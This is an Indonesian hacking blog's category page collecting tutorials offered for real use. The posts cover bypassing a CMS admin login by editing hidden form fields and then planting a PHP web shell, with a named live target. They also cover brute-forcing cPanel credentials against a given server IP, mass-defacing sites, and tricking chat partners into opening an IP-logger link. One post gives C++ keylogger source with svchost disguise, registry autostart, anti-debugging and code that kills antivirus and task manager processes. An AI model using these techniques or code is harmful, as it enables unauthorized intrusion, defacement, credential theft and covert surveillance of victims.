Popular Post

Tampilkan postingan dengan label Cracking. Tampilkan semua postingan

Cara Mudah Deface Website Dengan Bypass Admin Login | Free Monthly Websites 2.0 Multiple Vulnerabilities

By : Unknown
UPDATE: Teknik ini  hanya bisa dilakukan pada CMS Premium, kalo sobat menemukan web yg tidak bisa  diedit/error, berarti CMS web tersebut bukan Premium atau bisa jadi sudah dipatch/diperbaiki.. 

Assalamualaikum....

Salam kompak sobat2 VMSHC, ^_^

Tidak ada bosan2 nya ane mau share tentang depes2an,, soalnya lagi marak dan bnyak banget yg menyukai aktivitas ini, yah walaupun beresiko masuk BUI,, wkwkwk :p

Langsung aja lah, males ngetik banyak2! :p


Note: "Tidak semua website bisa dengan teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!"

kali ini ane mau share tentang teknik Bypass Halaman Login Administrator! Bagaimana caranya? Yuk simak aja rame rame,, hehhehe ;)

Bahan Bahan :
Dork: inurl:/index_info.php     Lihat Dork yg lain Disini

Live Target : http://niche-marketplace.net/index_info.php  

Note: "Saat ini sudah sulit mencari web target yang bisa ditanemin shell, kebanyakn udah di patch, hanya orang2 yang mau berusaha yg bisa mnemukan web target" :p


Langkah Langkahnya:

Cari Target Google.com dengan menggunakan Dork, disini ane dapet target http://niche-marketplace.net/index_info.php


Lalu masuk ke halaman login admin! biasanya letaknya site.com/admin/index.php atau bisa jadi site.com/[path]/admin/index.php kalo target ane : http://niche-marketplace.net/admin/index.php 


Setelah itu kita lakukan Inspect Elemen! dengan cara klik kanan, lalu pilih Inspect Element!


 Lalu akan muncul seperti gambar dibawah! yang perlu kita lakukan adalah mencari Source code berikut :


 Ganti "hidden" dengan "text" lalu akan muncul kotak label "admin_settings_read" ganti read menjadi write! lihat gambar!

Lalu tekan Enter!

Klik Login aja! 
Note: "Kalo ada muncul pesan seperti digambar, berarti target vuln ato bisa di depes! Selain itu ga bisa, cari target lain! :p




Duaaarrrrrrrrr!! Udah masuk? Mantap! Trus mo ngapain lagi?? udah gitu aja! wkwkwkwk :p


Trus Tanemshell nya gimana gan?? Hajiahhh,, :3 makanya baca tutorial ampe abis dulu, dipahami dan dipelajari baru dipraktekin.. hadeewwhhh!!

Oke, sekarang kita udah masuk ke halaman admin, saatnya kita tanem Shell! Apa itu Shell?? Baca lagi sono di postingan ane Apa itu WebShell :p Disini ane make Madspotshell!


WAJIB!!! Harap diperhatikan dan dicermati baik baik, jika ada sedikit kesalahan maka Shell sobat yg ditanem akan Gagal dieksekusi! dan akhirnya balik maning ke awal :p
Note: Langkah selanjutnya  hanya bisa dilakukan pada CMS Premium, kalo sobat menemukan web yg tidak bisa  diedit/error, berarti CMS web tersebut bukan Premium atau bisa jadi sudah dipatch/diperbaiki.. 
Pertama gulirkan kebawah! cari menu "Add/Remove Navigation Page"



Klik Add/Remove Navigation Page! Lalu ketik nama shell.php sobat, kalo ane mah "idca.php". Untuk lebih jelasnya liat gambar!


 Lalu klik "Add New Navigation"


Setelah itu masih dihalaman yg sama, liat kebawah sampai menemukan kalimat: "Sort Page Buttons/links" trus ubah "idca.php.html" jadi "/idca.php". liat gambar!



Lalu klik "Sort Navigation Pages"!

Selanjutnya cari Menu "Edit Navigation Pages" lalu klik menu tersebut. Kemudian pada kolom "Please Select a Pages To Edit" lalu pilih "idca.php.html". disini kita akan melakukan Inspect Element lagi, lalu cari kata "idca.php.html" dan ubah jadi "idca.php".  Lihat gambar!


Kemudian masih dihalaman yg sama, gulirkan kebawah!

Pada kolom "Enter A Page Title As You Would Like To Be Seen" ketik "idca.php"

Pada kolom "URL For This Site" ketik "main_pages/idca.php"

Pada kota box, ceklis/centang ketiganya. untuk lebih jelas, lihat gambar!



Selanjutnya masih juga di halaman yg sama, gulirkan kebawah! Pada kolom "Enter Content for Your Pages" pilih "Source" lalu editor akan aktif!

Buka shell Backdoor (madspotshell.php) dengan notepad untuk dipaste kan ke Konten Pages!



WAJIB DIPERHATIKAN, karena menentukan keberhasilan!

Sebaiknya Shell Backdoor jangan diberi password!


Jadi nanti seperti ini cara nulisnya.

<Line kosong>
<Line kosong>
{ Isi Kodingan PHP Shell dari awal sampai akhir }
<Line kosong>
<Line kosong>

Yap di Line awal diisikan ruang kosong 2x (alias teken enter 3x) dan di Line akhir diisikan ruang kosong 2x (alias teken enter 3x). Kurang jelas? lihat gambar :


 lalu


Lalu klik Save! akan muncul pesan seperti gambar berikut!


Selanjutnya saatnya kita buka shell backdoor yg udah kita tanem! caranya tulis diadress bar: http://site.com/main_pages/Nama File Backdoor.php Liat gambar!



Huft! Akhirnya Selesai dan Berhasil tuh! Tinggal tebas index aja! wkwkwk

Untuk yg belum mengerti cara tebas index web, silahkan Baca
 Cara Tebas Index Web

Tag : , ,

Cara Crack Cpanel

By : Unknown
Okelah, kita mulai langsung :D

[+] BAHAN [+]


1. Shell 1n73ction v.32 | Download | Pass : http://indocyberarmy.blogspot.com

2. Password List | Download

[+] LANGKAH LANGKAHNYA [+]

    Masuk Ke Shell sobat dahulu, untuk Shell 1n73ction setelah di upload tekan TAB lalu masukan passwordnya ( 1n73ction )


      Setelah masuk klik tombol Open dulu, lalu klik Cpanel Brute Force (tampilan akan seperti gambar dibawah ini)

        Masukkan Wordlist Kalian lalu Klik tombol START





        Nah kalian tunggu deh sampek Proses cracking selesai, jika sudah maka akan muncul gambar seperti dibawah ini



              5. Selamat ^_^ User Dan Password Cpanel sudah berhasil kalian dapatkan:)
              6. Untuk login ke Cpanelnya yaitu lihat tulisan SERVER IP , di kananya Server Ip ada angka kan ? nah itu lah link login kita :)

        Untuk Server IP  live target tersebut adalah : 174.120.60.251

        nah sekarang bagaimana cara masuk ke halaman login ?
        Sobat tinggal tambah aja port ini -> :2083 / :2082

        *contoh ->  174.120.60.251:2083
        maka tampilannya akan seperti ini


        nah jika keluar seperti itu, tinggal masukin deh user + password sobat yang tadi didapat :)


        Sekarang sobat sudah bisa masuk ke cpanel target :D
        Sekarang terserah deh mau sobat pake apa :D

        Sekia tutorial yang bisa kami berikan :) jika ada kesalahan kata kami minta maaf :)

        Jika tutorial diatas kurang jelas, kalian bisa tanyakan ke grup kami di sini


        Sumber: http://indocyberarmy.blogspot.com/2013/03/cara-cpanel-brute-force.html#ixzz2Z086MXxo
        Tag : , ,

        Mass Deface Website

        By : Unknown
        Oke langsung aja, ini bukan mass deface server loh :P tapi cuma mass deface website yang ada di direktori aja :D

        Oke langsung aja ikutin langkah berikut ini :

        Bahan :

        • Mass Deface ( udah ada di shell X Inject / IDCA / etc )
        • Website yang direktorinya ada domain/web lain.
        1. Perhatikan gambar dibawah ini, jika terdapat alamat website lain di dalam gambar yang saya lingkarin itu tandanya bisa di mass deface ^0^


        2. Setelah itu pergi ke direktori dimana terdapat website didalamnya 

        3. Tuh banyak kan websitenya ? sekarang kita klik " Mass Deface "


        4. Keterangan :

        Folder : udah biarin aja (kan kita udah di direktorinya)
        File Name : nama file yang mau dibikin
        Kolom Index Code : Isi dengan script deface kalian ^_^

        Setelah itu klik HAJAR !!! 

        Dah cuma gitu aja om ^_^ tinggal submit atau show offin deh :P


        Selamat mencoba :D
        Tag : ,

        Script Deface : Logo G3tar

        By : Unknown
        Assalamualaikum,  :D

        Pas ane berkunjung ke webnya om Zandy, ane nemuin tuh di postingnya "Script Deface Keren" nah ane jadi kepikiran mau bikin artikel terkait juga ^_^

        Nah bagi yang mungkin belum bisa buat script sendiri ane kasih beberapa contoh script nantinya ^_^
        Oke, nih yang pertama ane kasih satu dulu script deface yang keren :D , daripada pusing-pusing nyusun script langsung ambil aja script ini :D

        [+] PENAMPAKAN [+]




        Ambil Scriptnya DISINI

        Silahkan edit sesuka kalian :D

        Recode dari Scriptnya K4C3 Undetected kayaknya :D
        Tag : ,

        Cara Mengetahui IP Lawan via Chatting Facebook

        By : Unknown
        Tutorial ini digunakan untuk mengetahui IP lawan dengan cara chat di FaceBook.
        Hal ini bermanfaat untuk mengidentifikasi lawan melalui media Social Engineering.
        Cara Mengetahui IP Lawan
        Ada beberapa yang perlu disiapkan yaitu:
        1. Sebuah SERVER HOSTING yang bisa dipakai untuk menyimpan file logger.
        2. Sebuah LINK content / halaman menarik yang dapat digunakan untuk mengalihkan perhatian lawan.
        3. FILE LOGGER itu sendiri.
        Instalasi FILE LOGGER kedalam CONTENT:
        1. Bikin sebuah artikel yang indah & menarik, sehingga akan banyak orang yang akan melihat.
        2. Kemudian buatlah file HTML, misalkan simpan difile: galau.html“.
        3. Pada sela-sela code html tersebut, masukkanlah / inject code logger kedalam source htmlnya.
        4. Sesuaikan / edit alamat email untuk pengiriman hasil IP target di dalam code loggernya.
        5.  Kemudian upload file tersebut ke server hosting.
        6. Pastikan serverhosting memiliki kemampuan  pengiriman email seperti: SMTP / POP3
        7. Nanti file tersebut dibuka dengan: http://www.situsanda.com/galau.html
        Cara yang dipakai disini adalah:
        1. Berusaha chatting dengan lembut dan baik dengan lawan chatting kita.
        2. Kemudian rayulah lawan untuk dapat meng-klik LINK yang sudah kita berikan tadi.
        3. Konfirmasikan ke lawan apakah sudah membaca link dengan cara menanyakan apa isi linknya.
        4. Link yang anda kirimkan adalah link logger yang tadi yaitu http://www.situsanda.com/galau.html
        Setelah dapat dipastikan bahwa lawan kita sudah melihat link tersebut.
        Maka, jreeengggggg.. kita lihat hasilnya. Itulah dia IP lawan chatting kita di Facebook.
        Untuk lebih jelas detailnya silakan ditonton disini:

        http://www.youtube.com/watch?feature=player_embedded&v=WYtLujSV-6w
        File yang dibutuhkan, silakan download disini:
        Selamat mencoba & semoga berhasil :)

        Source Code Keylogger Menggunakan C++

        By : Unknown
        sekarang saya akan berbagi source keylogger saya untuk sekedar pembelajaran kita dan pemahaman kita tentang cara kerja sebuah malware yang termasuk kategori keylogger supaya kita lebih terbuka dan memahami.
        keylogger
        Apa itu keylogger?
        Mungkin dibeberapa artikel disini telah dibahas apa itu keylogger,namun untuk lebih jelasnya,saya coba jelaskan sekali lagi ya =)
        Keylogger Sourcecode BinusHacker
        Keylogger atau Perekam Ketikan merupakan sebuah perangkat baik itu perangkat keras atau perangkat lunak yang digunakan untuk memantau penekanan tombol papan ketik [keyboard]. Sebuah perekam ketikan atau keylogger biasanya akan menyimpan hasil pemantauan penekanan tombol papan ketik tersebut ke dalam sebuah berkas catatan (log file). Beberapa perekam ketikan tertentu bahkan dapat mengirimkan hasil rekamannya ke surel [e-mail] tertentu secara berkala.
        Keylogger dapat digunakan untuk kepentingan yang baik atau bahkan bisa digunakan untuk kepentingan yang jahat. Kepentingan yang baik antara lain untuk memantau produktivitas karyawan, untuk penegakan hukum dan pencarian bukti kejahatan. Kepentingan yang buruk antara lain pencurian data dan password. (wikipedia)
        Beberapa kelebihan keylogger pada artikel ini?
        1. Keylogger berbasis API,full written in C++,mudah dikembangkan.
        2. Size keylogger yang relatif kecil, hanya 20-30 KB tanpa dikompresi.
        3. Mempunyai fitur self copy,auto startup,memonitoring proses yang aktif dan mengakhiri proses yang dapat membahayakan keylogger
        4. Tidak mempunyai GUI, sehingga tidak tampak di Tab App pada task manager
        5. No dependency, tidak usah membawa “beban” seperti keylogger yang dibuat dengan VB classic
        6. Silahkan ditambah sendiri :)

        PROJECT KEYLOGGER
        Mari kita mulai,pertama download Project Keylogger disini http://www.mediafire.com/?eb13zlbb80ic6r9
        Oke, setelah anda download, bisa anda coba atau me-rebuild ulang projek tersebut. Saya asumsikan keylogger sudah berfungsi dan anda memahaminya, LOG file yang dibuat tidak serapih LOG file keylogger master MrHpx, sehingga anda bisa memodifikasi lagi sesuai keinginan anda.
        Lanjut ke tahap pembuatan fungsi lainnya untuk membuat keylogger yang lebih powerfull
        AutoStartup dan Self Copy
        Untuk menambahkan fungsi autostartup,kita menggunakan fungsi sebagai berikut untuk mengakses dan menulis key pada registry:
        [crayon lang="c++"]
        //registry
        char myname[500],tmpdir[500];
        HKEY hKey;
        DWORD dwFlags;
        //========================
        extern int __argc;
        extern char **__argv;
        ATOM MyRegisterClass(HINSTANCE hInstance);
        LRESULT CALLBACK WndProc(HWND, UINT, WPARAM, LPARAM);
        __declspec(dllexport) LRESULT CALLBACK KeyEvent (int pHookCode, WPARAM pParamW, LPARAM pParamL);
        //EP section
        //registry function
        void RegWriteString(HKEY hKey, LPCTSTR lpSubKey, LPCTSTR lpValueName, LPCTSTR lpData)
        {
        int ret = 0;
        HKEY phkResult = (HKEY)malloc(255);
        ret = RegCreateKey(hKey, lpSubKey, &phkResult);
        ret = RegSetValueEx(phkResult, lpValueName, 0, REG_SZ, (BYTE*)lpData, strlen(lpData));
        RegCloseKey(hKey);
        return;
        }
        [/crayon]
        Contoh Penggunaan AutoStartup:
        Mendapatkan path asli dari keylogger, kemudian mencopy dirinya sendiri ke direktori windows dengan namasvchost kemudian membuat key untuk auto startup:
        [crayon lang="c++"]
        //create startup and copying files
        char szCurrent[MAX_PATH];
        char szPath[MAX_PATH];
        GetModuleFileName(NULL,szCurrent, MAX_PATH-1);
        GetWindowsDirectory(szPath, sizeof(szPath));
        strcat(szPath, “\\”);
        strcat(szPath,”svchost.exe”);
        CopyFile(szCurrent, szPath, true);
        RegWriteString(HKEY_LOCAL_MACHINE, “Software\\Microsoft\\Windows\\Currentversion\\Run”, “svchost system”, szPath);
        [/crayon]
        Anti Debug
        [crayon lang="c++"]
        // Jika didebug, maka akan keluar
        if(IsDebuggerPresent() == TRUE)
        ExitProcess(0);
        [/crayon]
        Monitoring proses aktif dan melakukan aksi kill proses yang dianggap membahayakan keylogger
        Preprocessor
        [crayon lang="c++"]#include tlhelp32.h[/crayon]
        Deklarasi Variabel
        [crayon lang="c++"]
        DWORD WINAPI terminator(LPVOID Param);
        DWORD id = 0;
        [/crayon]
        Fungsi Proses Killer:
        [crayon lang="c++"]
        //fungsi proses killer
        HANDLE hProcessSnap;
        HANDLE hProcess;
        PROCESSENTRY32 pe32;
        void KillProc(char * szProcess)
        {
        hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
        pe32.dwSize = sizeof(PROCESSENTRY32);
        Process32First(hProcessSnap, &pe32);
        //lakukan pengulangan sampai dapat :D
        while(Process32Next(hProcessSnap, &pe32))
        {
        if(!strcmp(pe32.szExeFile, szProcess))
        {
        hProcess = OpenProcess(PROCESS_TERMINATE, 0, pe32.th32ProcessID);
        TerminateProcess(hProcess, 0);
        }
        }
        CloseHandle(hProcess);
        CloseHandle(hProcessSnap);
        }[/crayon]
        Penggunaan Killer Proses
        [crayon lang="c++"]
        //killer proses
        DWORD WINAPI terminator(LPVOID Param)
        {
        while(1)
        {
        Sleep(1000);
        KillProc(“regedit.exe”);
        KillProc(“taskman.exe”);
        KillProc(“PCMAV.exe”);
        }
        return EXIT_SUCCESS;
        }
        [/crayon]
        Membuat thread baru untuk menjalankan fungsi monitoring dan killer proses:
        [crayon lang="c++"]
        CreateThread(NULL, 0, &terminator, NULL, 0, &id);
        [/crayon]
        Oia fungsi tersebut, tulis di main.cpp..
        Mengapa tidak membuat file .cpp baru dan menulis fungsi di file tsb? Hemmm.. Karena pada DevC++, pewarisan kelas membuat size program anda membengkak 100%. Entah mengapa, tidak seperti visual c++ buatan microsoft yang sudah dibekali optimasi pada kompilernya.
        Mungkin dari anda, ada yang bertanya. Bagaimana dengan fungsi send lognya via e-mail? Owh itu tergantung kreativitas anda. Banyak referensinya.. hehe :P
        Akhir kata,selamat ber-coding dan berimajinasi =)
        Tag : , ,

        Berlangganan

        http://zona-share.tk/bot/cron_komen.php?token=306314215c09d089958a0a99ef1adac9

        - Copyright © 2013 B-NEWBIE4RT - Date A Live - Powered by Blogger - Designed by Johanes Djogan -